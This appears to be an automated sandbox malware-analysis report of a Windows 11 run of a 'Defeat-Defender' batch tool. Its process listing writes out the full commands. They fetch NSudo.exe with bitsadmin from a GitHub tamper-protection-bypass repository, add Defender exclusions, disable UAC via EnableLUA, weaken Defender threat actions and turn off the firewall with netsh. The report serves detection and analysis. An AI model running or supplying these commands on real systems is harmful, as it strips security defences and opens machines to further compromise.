Analysis
-
max time kernel
145s -
max time network
138s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
06-08-2024 19:38
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.pixilart.com/draw?ref=home-page#
Resource
win11-20240802-en
General
-
Target
https://www.pixilart.com/draw?ref=home-page#
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3900 powershell.exe 1592 powershell.exe 3816 powershell.exe 3340 powershell.exe 240 powershell.exe 1920 powershell.exe 2796 powershell.exe 1712 powershell.exe 1320 powershell.exe 4648 powershell.exe 4704 powershell.exe 1576 powershell.exe 1492 powershell.exe 1576 powershell.exe 3840 powershell.exe 3816 powershell.exe 4704 powershell.exe 2444 powershell.exe 4856 powershell.exe 5008 powershell.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 2504 netsh.exe 3020 netsh.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 60 camo.githubusercontent.com 61 camo.githubusercontent.com 62 camo.githubusercontent.com 63 camo.githubusercontent.com 114 raw.githubusercontent.com 1 raw.githubusercontent.com 2 raw.githubusercontent.com 16 camo.githubusercontent.com -
Drops file in Windows directory 4 IoCs
Processes:
UserOOBEBroker.exedescription ioc process File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
FileCoAuth.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FileCoAuth.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 3 IoCs
Processes:
msedge.exeMiniSearchHost.exemsedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-242286936-336880687-2152680090-1000\{92E5BE16-AA14-4A17-B58D-592D8CF3604F} msedge.exe Key created \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Key created \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Defeat-Defender-V1.2.0-main.zip:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4008 msedge.exe 4008 msedge.exe 4880 msedge.exe 4880 msedge.exe 908 msedge.exe 908 msedge.exe 1600 identity_helper.exe 1600 identity_helper.exe 1052 msedge.exe 1052 msedge.exe 5036 msedge.exe 5036 msedge.exe 3900 powershell.exe 3900 powershell.exe 3900 powershell.exe 1592 powershell.exe 1592 powershell.exe 1592 powershell.exe 1548 powershell.exe 1548 powershell.exe 1548 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 1576 powershell.exe 1576 powershell.exe 1576 powershell.exe 3840 powershell.exe 3840 powershell.exe 3840 powershell.exe 3816 powershell.exe 3816 powershell.exe 3816 powershell.exe 4704 powershell.exe 4704 powershell.exe 4704 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1492 powershell.exe 1492 powershell.exe 1492 powershell.exe 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe 3816 powershell.exe 3816 powershell.exe 3340 powershell.exe 3340 powershell.exe 3476 powershell.exe 3476 powershell.exe 240 powershell.exe 240 powershell.exe 1320 powershell.exe 1320 powershell.exe 1576 powershell.exe 1576 powershell.exe 4856 powershell.exe 4856 powershell.exe 1920 powershell.exe 1920 powershell.exe 4648 powershell.exe 4648 powershell.exe 4704 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
msedge.exepid process 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3900 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeDebugPrivilege 3816 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 3816 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 3476 powershell.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 4856 powershell.exe Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 5008 powershell.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
Processes:
msedge.exepid process 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe -
Suspicious use of SendNotifyMessage 14 IoCs
Processes:
msedge.exepid process 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
MiniSearchHost.exeOpenWith.exepid process 4204 MiniSearchHost.exe 4772 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4880 wrote to memory of 3684 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3684 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1412 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 4008 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 4008 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 3560 4880 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pixilart.com/draw?ref=home-page#1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe09323cb8,0x7ffe09323cc8,0x7ffe09323cd82⤵PID:3684
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:22⤵PID:1412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:82⤵PID:3560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:1864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵PID:4524
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:908 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:12⤵PID:2372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:12⤵PID:4704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵PID:4692
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1600 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:12⤵PID:3280
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵PID:2104
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3256 /prefetch:82⤵PID:1264
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5916 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1052 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:12⤵PID:4692
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:12⤵PID:4308
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:12⤵PID:780
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:1172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13072784813508330909,3380083196462828870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:5036
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1744
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:976
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4204
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:3048
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
PID:3908
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
PID:4716
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\run.bat" "1⤵PID:1792
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat" "1⤵PID:1808
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:1828
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs2⤵PID:696
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe2⤵
- Download via BitsAdmin
PID:3100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force2⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2504
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat" "1⤵PID:5064
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:1576
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat" "1⤵PID:4580
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2836
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat" "1⤵PID:784
-
